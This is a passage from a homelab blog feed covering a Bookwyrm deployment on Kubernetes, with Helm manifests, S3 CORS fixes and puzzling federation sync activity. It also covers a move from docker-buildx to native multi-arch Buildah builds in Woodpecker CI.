</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-celery-beat</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;beat&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-l&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;INFO&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--scheduler&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;django_celery_beat.schedulers:DatabaseScheduler&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-flower</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;flower&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--url_prefix=flower&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.flower }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Only one comment to the above: Take the resource requests with a grain of salt,
I haven&rsquo;t gotten around to looking at the metrics for the first week of
deployment. The above values are still the semi-random values I drew out of a
hat while writing the manifest.</p>
<p>At this point, I thought I was done. But that would have been too easy.</p>
<h3 id="the-power-of-css">The power of CSS</h3>
<p>The reason I was sure I wasn&rsquo;t done yet is that the home page of Bookwyrm looked
like this when I first opened it:</p>
<figure>
    <img loading="lazy" src="bookwyrm-unstyled.png"
         alt="A screenshot of the homepage of my Bookwyrm instance before logging in. It is a bit...minimal, shall we say. The only styling visible is the font size of headings and the fact that those are written in bold, and the fact that links have the typical link coloring. Everything, including text boxes for username/password entry, is completely unstyled. And everything is squished on the left side of the page."/> <figcaption>
            <p>There&rsquo;s clearly something wrong.</p>
        </figcaption>
</figure>

<p>Obviously, that&rsquo;s not what it&rsquo;s supposed to look like. Those of you who are a
bit more familiar with webdev than I am will likely immediately see that there&rsquo;s
some problem with the CSS, but to me it was not quite that clear. A look into the
browser console with messages about the file not being found lead me to the
same conclusion. I saw the following when opening the sources of the page:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">link</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://s3-bookwyrm.mei-home.net/css/themes/bookwyrm-light.css&#34;</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;stylesheet&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text/css&#34;</span> /&gt;
</span></span></code></pre></div><p>But when looking at the S3 bucket, I saw that the file was at <code>/static/...</code>.
Searching a bit, I found <a href="https://github.com/bookwyrm-social/bookwyrm/issues/3383">this bug</a>.
It was already fixed in the newest release, <code>v0.7.5</code>, but I had started out with
<code>v0.7.4</code>, as I wanted to have a chance to test my upgrade hook/script right away.</p>
<p>After updating to <code>v0.7.5</code>, I at least got some proper styling, but it still
looked like some things were missing:
<figure>
    <img loading="lazy" src="bookwyrm-cors.png"
         alt="A screenshot of the homepage of my Bookwyrm instance. This time, there&#39;s definitely some styling present. But notably, some font issues are visible, with only the glyphs with the Unicode numbers showing, not the actual symbols."/> <figcaption>
            <p>Finally styled, but still with some font glyhs clearly missing.</p>
        </figcaption>
</figure>
</p>
<p>Note especially the missing glyphs for the symbols above &ldquo;Dezentral&rdquo;, &ldquo;Freundlich&rdquo;
and &ldquo;Nichtkommerziell&rdquo;. And please forgive the partial German language, I hadn&rsquo;t
realized the language mix when taking the screenshot.</p>
<p>Looking at the browser console again, I saw <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS/Errors/CORSMissingAllowOrigin">this error message</a>.
Checking a bit further, I found that I missed a part of Bookwyrm&rsquo;s <a href="https://docs.joinbookwyrm.com/external-storage.html#cors-settings">S3 setup docs</a>.
I followed <a href="https://docs.hetzner.com/storage/object-storage/howto-protect-objects/cors/">these docs from Hetzner</a>
to apply the necessary CORS configs to my S3 bucket. I couldn&rsquo;t directly apply
the JSON config provided in the Bookwyrm docs, because <code>s3cmd</code>, my default S3
tool, doesn&rsquo;t support JSON for the CORS config, only XML. So I translated it
to this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-xml" data-lang="xml"><span style="display:flex;"><span><span style="color:#f92672">&lt;CORSConfiguration&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;CORSRule&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedHeader&gt;</span>*<span style="color:#f92672">&lt;/AllowedHeader&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>GET<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>HEAD<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>POST<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>PUT<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedMethod&gt;</span>DELETE<span style="color:#f92672">&lt;/AllowedMethod&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;MaxAgeSeconds&gt;</span>3000<span style="color:#f92672">&lt;/MaxAgeSeconds&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;ExposeHeader&gt;</span>Etag<span style="color:#f92672">&lt;/ExposeHeader&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&lt;AllowedOrigin&gt;</span>https://bookwyrm.example.com<span style="color:#f92672">&lt;/AllowedOrigin&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;/CORSRule&gt;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;/CORSConfiguration&gt;</span>
</span></span></code></pre></div><p>I stored the above XML config into a <code>cors.xml</code> file and applied it to my
Bookwyrm bucket with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c s3-conf setcors cors.xml s3://bookwyrm/
</span></span></code></pre></div><p>Here, <code>s3-conf</code> is the s3cmd config for my Ceph S3 setup.</p>
<p>And after that, I was finally done: Bookwyrm looked like it was supposed to! &#x1f389;</p>
<h3 id="initial-network-sync">Initial network sync?</h3>
<p>After I had finally set up my instance, I started to enter a few books, mostly
for testing purposes. Which was when I realized that I could hear a lot of disk
activity. And looking at my metrics, I found that the Bookwyrm container was
using a lot of CPU:
<figure>
    <img loading="lazy" src="high-cpu.png"
         alt="Screenshot of a Grafana time series graph. It shows the entirety of August 24th, from 00:00 to 23:59. For most of this time, the graph, which is from the bookwyrm-celery-worker container, shows more or less a flat line around 0.01, with only very occasional spikes to 0.6 at max. Then came 16:21, and the CPU utilization suddenly went up to peaks of 1.7 and did not get lower than 0.6 anymore, mostly oscillating around 1.4. This went on until about 21:45, when the line went back to 0.01."/> <figcaption>
            <p>CPU utilization of the bookwyrm-celery-worker container.</p>
        </figcaption>
</figure>
</p>
<p>Looking around a bit more, I also found that there were a lot of new objects
created in my S3 pool on Ceph:
<figure>
    <img loading="lazy" src="ceph-objects.png"
         alt="Another Grafana time series screenshot. This time, it shows the object creation and deletion in the Ceph pool used for data storage for my S3 setup. It again shows the entire day, from 00:00 to 23:59. It again mostly stays around 0, meaning no objects are created or deleted. But there is a very regular spike of 12 new objects being created every five minutes. Besides that, there are a couple of spikes, both for lots of added and lots of removed objects. The main event again happens starting around 16:21, with the creations suddenly increasing to about 600 objects. This goes on, like the celery cPU usage from the previous graph, to about 21:45, when it returns to the previous levels."/> <figcaption>
            <p>Object changes in the S3 data pool, negative values are removed objects, positive values are numbers of added objects.</p>
        </figcaption>
</figure>
</p>
<p>So it seemed that something was going on with Bookwyrm there, but I had no idea
what it might be. Checking the S3 bucket, I saw a lot more book covers appearing
in there. But I hadn&rsquo;t even done much at that point, just added a handful of
books. At that point I was flailing a little bit for what it might be. Then I
had the idea of looking at flower, which the Bookwyrm docs advertise as a way
to look at ongoing tasks.</p>
<p>This was the picture presented to me at the time:
<figure>
    <img loading="lazy" src="bookwyrm-flower-tasklist.png"
         alt="A screenshot of flower&#39;s task list. It shows a lot of them, an entire screen of 15 tasks, all started just between 19:39:15 and 19:39:26. The shown task names only have two variations, &#39;base_activity.set_related_field&#39; and &#39;add_status_task&#39;. The args are also shown, and all seem to be the addition of &#39;Works&#39;, which I think is a book in Bookwyrm&#39;s object model."/> <figcaption>
            <p>List of tasks in Flower</p>
        </figcaption>
</figure>
</p>
<p>Noteworthy is that most of the tasks are related to <code>Work</code> objects, which, if
I&rsquo;m not mistaken, are books in Bookwyrm&rsquo;s object model. So there seem to be a lot
of things being done with a lot of books. And I had only added two or three
books myself at that point, and hadn&rsquo;t followed a single person yet. Also note
that the tasks all started in the same minute, 19:39. And it went on and on like
this.</p>
<p>Then I saw that there&rsquo;s a link to my instance in the <code>args</code> column, and I clicked
one of the tasks to get to this details page:
<figure>
    <img loading="lazy" src="bookwyrm-single-task.png"
         alt="A screenshot of flower&#39;s task details for one of the &#39;base_activity.set_related_field&#39; tasks. The important part here is the full content of the args value: &#39;Edition,Work,parent_work,https://bookwyrm.mei-home.net/book/16858,https://bookwyrm.social/book/151006&#39;."/> <figcaption>
            <p>Example of task details.</p>
        </figcaption>
</figure>
</p>
<p>I then checked which book the shown <a href="https://bookwyrm.mei-home.net/book/16895/s/the-dark-tower">https://bookwyrm.mei-home.net/book/16858</a>
URL from the <code>args</code> value points to:
<figure>
    <img loading="lazy" src="dark-tower-book.png"
         alt="A screenshot of the Bookwyrm book page for Stephen King&#39;s The Dark Tower."/> <figcaption>
            <p>This was the book the flower task related to</p>
        </figcaption>
</figure>
</p>
<p>The thing is: I hadn&rsquo;t interacted with that book, at all. So I tried a few more
books from other flower tasks, and they were the same - books I had not interacted
with. So the only conclusion I can draw for now is that Bookwyrm looks at all
known instances and downloads their entire database of books and adds them to
my instance?</p>
<p>If you actually know what&rsquo;s going on here, please contact me at <a href="https://social.mei-home.net/@mmeier">my Mastodon account</a>
and tell me. I&rsquo;m genuinely curious.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>I&rsquo;m really curious what that initial database sync (?) was for.</p>
<p>The Bookwyrm setup also holds one last challenge: Resisting the temptation of
entering all the books I&rsquo;ve read in the last 32 years. &#x1f605;</p>
<p>Last but not least, if you&rsquo;d like to follow my reading, I&rsquo;m <a href="https://bookwyrm.mei-home.net/user/mmeier">https://bookwyrm.mei-home.net/user/mmeier</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Improving Multi-Arch Image Build Performance by not Emulating</title>
      <link>https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/</link>
      <pubDate>Sat, 16 Aug 2025 21:10:15 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/</guid>
      <description>I&amp;#39;ve recently improved my container image build performance by not emulating anymore</description>
      <content:encoded><![CDATA[<p>Wherein I update my container image build pipeline in Woodpecker with buildah.</p>
<p>A couple of weekends ago, I naively thought: Hey, how about stepping away from
my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell experiments</a> for a weekend
and quickly setting up a <a href="https://joinbookwyrm.com/">Bookwyrm</a> instance?</p>
<p>As such things tend to turn out, that rookie move turned into a rather deep
rabbit hole, mostly on account of my container image build pipeline not really
being up to snuff.</p>
<h2 id="the-current-setup">The current setup</h2>
<p>Before going into details on the problem and ultimate solution, I&rsquo;d like to
sketch out my setup. For a detailed view, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-15-ci/#docker-repo-example">this post</a>.</p>
<p>I&rsquo;m running <a href="https://woodpecker-ci.org/">Woodpecker CI</a> in my Kubernetes cluster,
running container image builds via the <a href="https://woodpecker-ci.org/plugins/docker-buildx">docker-buildx plugin</a>.</p>
<p>As I&rsquo;m running Woodpecker with the <a href="https://woodpecker-ci.org/docs/administration/configuration/backends/kubernetes">Kubernetes backend</a>,
each step in a pipeline will be executed in its own Pod. Each pipeline, in turn,
gets a PersistentVolume mounted, which is shared between all steps of that
pipeline. In my pipelines for the container image builds, I only run the docker-buildx
plugin as a step, once for PRs where the image is only build but not pushed, and
once for pushes onto main, where the image is build and pushed.</p>
<p>The docker-buildx plugin uses Docker&rsquo;s <code>buildx</code> command, and the BuildKit that
makes available to run the image build. Important to note for this post is that
BuildKit will happily build multi-arch images. It does so utilizing Qemu.</p>
<p>Now the issue with that is: The majority of my Homelab consists of Raspberry Pi 4
and a single low power x86 machine. As you might imagine, that makes emulation
very slow, especially on the Pis, which do not have any virtualization instructions.</p>
<p>Now onto the problems I&rsquo;m having with that setup.</p>
<h2 id="the-problems">The problems</h2>
<p>Let&rsquo;s start with the problem which
triggered this particular rabbit hole, the Bookwyrm image build. I won&rsquo;t go into
the details of the image here, that will come in the next post when I describe
the Bookwyrm setup.</p>
<p>The initial issue was one I had seen before on occasion. In this scenario, the
build just gets canceled, with no indication of what went wrong in the Woodpecker
logs for the build step. After quite a lot of digging, I finally found these lines
in the logs of the machine running one of the failed CI Pods:</p>
<pre tabindex="0"><code>kubelet[1088]: I0728 21:07:42.763129    1088 eviction_manager.go:366] &#34;Eviction manager: attempting to reclaim&#34; resourceName=&#34;ephemeral-storage&#34;
kubelet[1088]: I0728 21:07:42.763296    1088 container_gc.go:88] &#34;Attempting to delete unused containers&#34;
kubelet[1088]: I0728 21:07:43.131475    1088 image_gc_manager.go:404] &#34;Attempting to delete unused images&#34;
kubelet[1088]: I0728 21:07:43.172539    1088 eviction_manager.go:377] &#34;Eviction manager: must evict pod(s) to reclaim&#34; resourceName=&#34;ephemeral-storage&#34;
kubelet[1088]: I0728 21:07:43.174677    1088 eviction_manager.go:395] &#34;Eviction manager: pods ranked for eviction&#34; pods=[&#34;woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4&#34;,&#34;monitoring/grafana-pg-cluster-1&#34;,&#34;harbor/harbor-pg-cluster-1&#34;,&#34;harbor/harbor-registry-5cb6c944f5-wm6np&#34;,&#34;wallabag/wallabag-679f44d9d5-9gl8m&#34;,&#34;harbor/harbor-portal-578db97949-d52sp&#34;,&#34;forgejo/forgejo-74948996b9-r94c2&#34;,&#34;harbor/harbor-jobservice-6cb7fc6d4b-gsswv&#34;,&#34;harbor/harbor-core-6569d4f449-grtrr&#34;,&#34;woodpecker/woodpecker-agent-1&#34;,&#34;taskd/taskd-6f9699f5f4-qkjkr&#34;,&#34;kube-system/cilium-5tx4t&#34;,&#34;fluentbit/fluentbit-fluent-bit-frskm&#34;,&#34;rook-ceph/csi-cephfsplugin-8f4jh&#34;,&#34;rook-ceph/csi-rbdplugin-cnxfz&#34;,&#34;kube-system/cilium-envoy-gx7ck&#34;]
crio[780]: time=&#34;2025-07-28 21:07:43.179344359+02:00&#34; level=info msg=&#34;Stopping container: 7ba324965ba9ed751bd08ac4b464631b2d5dfa05d31f36d98253b68a0d5ec7d0 (timeout: 30s)&#34; id=b69f9664-c0ae-4505-9363-6966afa90b77 name=/runtime.v1.RuntimeService/StopContainer
crio[780]: time=&#34;2025-07-28 21:07:43.837431719+02:00&#34; level=info msg=&#34;Stopped container 7ba324965ba9ed751bd08ac4b464631b2d5dfa05d31f36d98253b68a0d5ec7d0: woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4/wp-01k194yzh8bg8tzngrf7x6w3k4&#34; id=b69f9664-c0ae-4505-9363-6966afa90b77 name=/runtime.v1.RuntimeService/StopContainer
kubelet[1088]: I0728 21:07:44.097018    1088 eviction_manager.go:616] &#34;Eviction manager: pod is evicted successfully&#34; pod=&#34;woodpecker/wp-01k194yzh8bg8tzngrf7x6w3k4&#34;
</code></pre><p>The Pod just ran out of space while building the images. The fix was relatively
simple, as Woodpecker already provides a Pipeline Volume. In the case of the
Kubernetes backend, that volume is a PVC created per pipeline and then mounted
into the Pods for all of the steps. In my case, that&rsquo;s a 50 GB CephFS volume. But
I wasn&rsquo;t using that volume for anything, as the storage for BuildKit, running my
image builds, was still at the default <code>/var/lib/docker</code>.</p>
<p>So hooray, just move the docker storage to the pipeline volume. I did so by
using the parameter the docker-buildx plugin already provides, <code>storage_path</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">storage_path</span>: <span style="color:#e6db74">&#34;/woodpecker/docker-storage&#34;</span>
</span></span></code></pre></div><p>And just like that, I had fixed the problem. Or not.
<figure>
    <img loading="lazy" src="timeout.png"
         alt="A screenshot of Woodpecker&#39;s CI run UI. It shows that the commit being build is from the &#39;bookwyrm-image&#39; branch. There are three steps in the pipeline: clone, clone Bookwyrm repo and build image. All three are seemingly successful, with clone taking 16 seconds, clone bookwyrm repo clocking in at 21s and build image taking 59:21. The overall workflow takes exactly 1h and is red. On the right is the build log for the image, showing a pip invocation. The last few lines indicate the build of the Python wheel for libsass, showing a lot of &#39;still running...&#39; outputs. The timestamps indicate that by the time of the timeout, the build was running for 21 minutes."/> <figcaption>
            <p>21 minutes and running for a libsass build.</p>
        </figcaption>
</figure>
</p>
<p>So much for that all too short moment of triumph. The storage issue was fixed,
but the image still could not be build. Looking through previous runs, I saw
that the issue wasn&rsquo;t just the duration of the <code>pip</code> install, but also the
initial pull of the Python image. In one of the test builds, the initial pull
took over 50 minutes all on its own. Not much time left for the actual
setup. The root cause was at least not I/O saturation. The CI run I was looking
at ran from 22:25 to 23:25 in the below graph:
<figure>
    <img loading="lazy" src="disk-io-cephfs.png"
         alt="A screenshot of a Grafana time series plot. It shows the time from 22:20 to 00:00. There are three plots shown, each representing one of the HDDs in my system. The metric is I/O utilization. At the beginning, it sits at around 20% to 35%, but at 23:23 it goes up to 80%, shortly followed by going up to around 100% for all three HDDs around 23:28. It stays there until around 23:56, when it goes back to below 10%."/> <figcaption>
            <p>I/O utilization on the HDDs in my Ceph cluster, home of the CephFS data pool.</p>
        </figcaption>
</figure>

The region of 100% I/O saturation in the end, starting at 23:25, is the CephFS
cleanup after the pipeline had failed and the image needed to be cleaned up. The
actual CI run is the 20% to 35% utilization before that.</p>
<p>But I still had the feeling that storage was at least part of the problem. So I
tried to use Ceph RBDs instead of CephFS, which also had the advantage of running
on SATA SSDs instead of HDDs. But that also did not bring any real improvements.
Sure, the build got a lot further and did not spend all its time just extracting
the Python image, but it still didn&rsquo;t finish within the 1h deadline.</p>
<p>I finally ended up figuring that the reason it was still timing out was emulation.</p>
<h2 id="removing-emulation-from-my-image-build-pipelines">Removing emulation from my image build pipelines</h2>
<p>As I&rsquo;ve mentioned above, the docker-buildx Woodpecker plugin I was using used
<a href="https://docs.docker.com/build/buildkit/">Docker&rsquo;s BuildKit</a> under the hood.
BuildKit has the ability to do multi-arch builds out of the box, and uses Qemu
for the non-native architectures. This gets pretty slow on a Raspberry Pi or a
low power x86 machine. So my next plan was to go for parallel builds of all
archs on hosts with the same arch.</p>
<p>BuildKit and docker-buildx already have support for doing this, via BuildKit&rsquo;s
<a href="https://docs.docker.com/build/builders/drivers/remote/">Remote Builders</a>. But
as per the docker-buildx <a href="https://codeberg.org/woodpecker-plugins/docker-buildx/src/branch/main/docs.md#using-remote-builders">documentation</a>,
this can only be done via SSH. I initially thought that this would work with
BuildKit daemons set up to receive external connections, but I was mistaken.
Instead of using BuildKit&rsquo;s build-in remote driver functionality, docker-buildx
instead sets up normal builders with their connection strings pointing to the
remote machines for which SSH was configured. BuildKit would then use those
remote machine&rsquo;s Docker sockets to run the builds.</p>
<p>After some thinking, I decided to dump docker-buildx altogether. I really didn&rsquo;t
like the idea of somehow setting up inter-Pod SSH connections. That just felt
all kinds of wrong.</p>
<p>So I decided: I&rsquo;ll just do it myself, using <a href="https://buildah.io/">Buildah</a>. I&rsquo;ve
had that on my list anyway, so here we go, a bit earlier than planned. Some
inspiration for what follows was found in <a href="https://danmanners.com/posts/2022-08-tekton-cicd-multiarch-builds/">this blog post</a>.
It uses Tekton as the task engine, not Woodpecker, but still was a good starting
point. It was especially useful for answering how to put together the images
produced for different architectures in one manifest.</p>
<p>I started out by building the image for Buildah. The Containerfile ended up
looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> alpine_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> alpine:$alpine_ver</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apk --no-cache update<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apk --no-cache add buildah netavark iptables bash jq<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>I then set up a simple test project in Woodpecker:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/buildah/buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah build -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span></code></pre></div><p>The Containerfile looked something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> alpine_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> alpine:$alpine_ver</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apk --no-cache update<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apk --no-cache add buildah<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>Basically, a copy of my Buildah image, just to have something to test.
One thing which surprised me to find out: Woodpecker doesn&rsquo;t actually allow
setting a platform per step. So I got lucky that the Kubernetes backend allows
me to specify the <code>nodeSelector</code> for the step&rsquo;s Pod.</p>
<p>Right away, the first run produced the following error:</p>
<pre tabindex="0"><code>Error: error writing &#34;0 0 4294967295\n&#34; to /proc/16/uid_map: write /proc/16/uid_map: operation not permittedtime=&#34;2025-08-07T20:31:45Z&#34; level=error msg=&#34;writing \&#34;0 0 4294967295\\n\&#34; to /proc/16/uid_map: write /proc/16/uid_map: operation not permitted&#34;
</code></pre><p>Clearly, my dream of rootless image builds would not be fulfilled today, so I
wanted to enable the project to be allowed to run privileged pipelines. Up to now,
I had the docker-buildx plugin in a separate instance-wide list of privileged
plugins. But my new container was, at this point, a simple step, not a plugin.</p>
<p>So my first step was to set my own user as an admin, because I had never needed
admin privileges for Woodpecker before. This I did via the <code>WOODPECKER_ADMIN</code>
environment variable in my <code>values.yaml</code> file for the Woodpecker chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_ADMIN</span>: <span style="color:#e6db74">&#34;my-user&#34;</span>
</span></span></code></pre></div><p>After that, the trusted project settings appeared in the Woodpecker settings
page:
<figure>
    <img loading="lazy" src="trusted-settings.png"
         alt="A screenshot of Woodpecker&#39;s project settings page. It shows the &#39;Project&#39; tab being selected. Under the &#39;Trusted&#39; heading, the &#39;Security&#39; option checkbox is checked. The &#39;Network&#39; and &#39;Volumes&#39; options are left unchecked."/> <figcaption>
            <p>Trusted settings in the project configuration of Woodpecker. The options under the &lsquo;Trusted&rsquo; heading only show up for admin users.</p>
        </figcaption>
</figure>

Enabling the <code>Security</code> option allowed me to run the Buildah containers in
privileged mode, by adding the <code>privileged: true</code> option.</p>
<p>The next error I got was this one:</p>
<pre tabindex="0"><code>Error: &#39;overlay&#39; is not supported over overlayfs, a mount_program is required: backing file system is unsupported for this graph driver
time=&#34;2025-08-07T20:57:11Z&#34; level=warning msg=&#34;failed to shutdown storage: \&#34;&#39;overlay&#39; is not supported over overlayfs, a mount_program is required: backing file system is unsupported for this graph driver\&#34;&#34;
</code></pre><p>At this point, my pipeline volume was still on a Ceph RBD, as I had not yet realized
that, with the plan of running multiple Buildah steps for the different platforms
in parallel, I would need RWX volumes for the pipelines. So I decided that the
